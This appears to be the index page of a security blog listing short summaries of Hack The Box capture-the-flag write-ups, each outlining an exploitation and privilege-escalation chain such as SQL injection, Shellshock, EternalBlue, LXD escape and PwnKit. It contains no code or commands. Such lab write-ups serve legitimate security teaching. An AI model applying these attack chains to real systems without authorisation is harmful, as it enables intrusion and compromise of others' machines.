securitea . tech
Penetration testing writeups, security bulletins, and lessons from the trenches of offensive security.
HTB: Jail
A stack buffer overflow with socket-reuse shellcode, NFS SUID escalation via raw syscall assembly, an rvim Python escape, and PwnKit combine for a four-stage privilege escalation on CentOS 7.
HTB: Brainfuck
A six-step attack chain across WordPress, SMTP, POP3, a Flarum forum with Vigenere encryption, SSH key cracking, and RSA cryptanalysis delivers the root flag without ever gaining a root shell.
HTB: WingData
A NULL byte in Wing FTP Server's login handler triggers Lua code injection for unauthenticated RCE, then a Python tarfile data filter bypass via PATH_MAX overflow writes an SSH key to root.
HTB: Pterodactyl
A critical LFI in Pterodactyl Panel's locale endpoint chains with pearcmd.php for unauthenticated RCE, then a PAM environment injection and udisks2 XFS resize race condition deliver root on openSUSE.
HTB: Kobold
An MCPJam Inspector RCE for initial access, PrivateBin template cookie LFI for container-level code execution, database password reuse across services, and a Docker management API that mounts the host root filesystem.
HTB: Interpreter
Pre-authentication Java deserialisation in Mirth Connect, PBKDF2 hash cracking of a dictionary password, and a Python f-string template injection in a root-owned Flask service for privilege escalation.
HTB: CCTV
Default credentials on ZoneMinder, a time-based blind SQL injection to extract bcrypt hashes, SSH password reuse, and a motionEye command injection running as root through a surveillance daemon's notification configuration.
HTB: Holiday
A Linux box combining SQL injection for credential extraction, stored XSS with aggressive filter bypass to steal an admin cookie, command injection through a character-restricted export endpoint, and sudo npm install for root.
HTB: Charon
A multi-stage Linux box requiring two SQL injection points, a case-sensitive keyword filter bypass, a hidden base64 upload field, RSA key factorisation, and a SUID binary with a newline injection to reach root.
HTB: Calamity
A 32-bit Linux box with hardcoded credentials, a PHP code injection endpoint, audio steganography for SSH credentials, and an LXD group membership that provides a container escape to root.
HTB: Garfield
An Active Directory domain with a Read-Only Domain Controller whose Password Replication Policy is writable by a Tier 1 admin, enabling the KERB-KEY-LIST attack to extract the Administrator's NT hash.
HTB: Facts
A path traversal in Camaleon CMS exposes Rails master keys, SQLite databases, and authentication tokens, enabling admin takeover through cookie forgery on a Ruby on Rails 8 application.
HTB: PiHole
Default Raspberry Pi credentials bypass the Pi-hole web surface entirely, passwordless sudo delivers root, and a deleted flag requires raw block device recovery with strings.
HTB: DevArea
Apache CXF MTOM SSRF reads credentials from systemd unit files, Hoverfly middleware provides RCE, and a world-writable /usr/bin/bash combined with a sudoers negation bypass delivers root.
HTB: Inception
A layered exploitation chain through dompdf LFI, WebDAV file upload, LXC container escape via anonymous FTP reconnaissance, and apt pre-invoke hook injection through TFTP.
HTB: Nineveh
A multi-stage chain through phpLiteAdmin, LFI with path filtering, steganographic SSH key extraction, and a chkrootkit privilege escalation on an Ubuntu 16.04 host.
HTB: Apocalyst
A steganographic wordlist hidden in a WordPress uploads image provides the admin password through brute-force, then a world-readable .secret file and LXD group membership deliver root via container escape.
HTB: Lazy
A padding oracle in a custom PHP authentication cookie enables CBC bit-flipping to forge admin access, exposing an SSH key. A SUID binary with a relative PATH call to cat completes the root chain.
HTB: October
Default credentials on October CMS grant admin access, the code editor provides RCE as www-data, and a 32-bit SUID buffer overflow with ASLR brute-force delivers root in under ten seconds.
HTB: TenTen
A WordPress Job Manager plugin leaks uploaded file names through predictable post IDs, revealing a steganographic image that hides an encrypted SSH key. A misconfigured sudo rule on /bin/fuckin completes the chain to root.
HTB: Bastard
Drupalgeddon 2 delivers unauthenticated RCE on a Windows Server 2008 R2 box with zero hotfixes, then JuicyPotato turns an IIS service account into SYSTEM via COM/DCOM token impersonation.
HTB: Europa
An SQL injection bypass on a TLS-disclosed admin portal leads to PHP code execution via preg_replace's /e modifier, then a writable cron script grants root.
HTB: Cronos
DNS zone transfer discloses a hidden admin subdomain, SQL injection bypasses authentication, command injection provides a shell, and a writable cron script escalates to root.
HTB: Beep
An Elastix PBX system with 15 open ports, a universal password across every service, and a local file inclusion that discloses credentials from the configuration file.
HTB: Bank
A DNS zone transfer leaks the domain, a failed encryption process exposes plaintext credentials, a debug file extension bypass enables a webshell, and a custom SUID binary gives instant root.
HTB: Blocky
A custom Minecraft plugin with hardcoded database credentials leads to SSH access via credential reuse, and sudo group membership completes the chain to root.
HTB: Optimum
A null byte injection in Rejetto HFS 2.3 gives unauthenticated RCE, and a Secondary Logon race condition escalates to SYSTEM on an unpatched Windows Server 2012 R2.
HTB: Grandpa
A buffer overflow in IIS 6.0's WebDAV handler delivers code execution on Windows Server 2003, and token kidnapping completes the escalation to SYSTEM.
HTB: Granny
IIS 6.0 with WebDAV enabled permits unauthenticated file upload via PUT and MOVE, bypassing extension restrictions to deploy an ASPX webshell. Token kidnapping (MS09-012) escalates NETWORK SERVICE to SYSTEM on Windows Server 2003.
HTB: Arctic
Adobe ColdFusion 8 on Windows Server 2008 R2 yields unauthenticated RCE through a three-part chain: directory traversal for credential extraction, FCKeditor file upload, and LFI-based CFML code injection. MS10-059 escalates to SYSTEM when JuicyPotato fails.
HTB: Sense
Default credentials and a plaintext credential disclosure file on a pfSense 2.1.3 appliance lead to authenticated command injection (CVE-2016-10709) running as root. The box demonstrates why network appliances are high-value targets: they run as root by design.
HTB: Shocker
A CGI bash script on Apache 2.4.18 is vulnerable to Shellshock (CVE-2014-6271), yielding RCE via a crafted User-Agent header. A sudo NOPASSWD entry for Perl completes the path to root. The real challenge is handling stdout pollution in CGI context.
HTB: Bashed
A developer leaves a PHP web shell in a publicly accessible directory, then compounds the mistake with a sudo misconfiguration and a root cron job reading from a user-writable directory. Three independent failures chain into full system compromise.
HTB: Blue
EternalBlue (MS17-010) turns an SMB-only Windows 7 host into a SYSTEM shell in under a minute. The box is a single-exploit machine, but the methodology around blind command execution and exfiltration via writable shares is worth studying.
HTB: Devel
Anonymous FTP write access to an IIS web root creates a trivial foothold. The real lesson is in the privilege escalation — unpatched Windows 7 with no service packs is a kernel exploit playground.
HTB: Legacy
MS08-067 on Windows XP — the vulnerability that powered the Conficker pandemic. A deep dive into the NetAPI32.dll buffer overflow that defined an era of network worms.
HTB: Lame
A command injection flaw in Samba's username map script configuration gives unauthenticated root on a Linux host — and a lesson in why the obvious exploit isn't always the right one.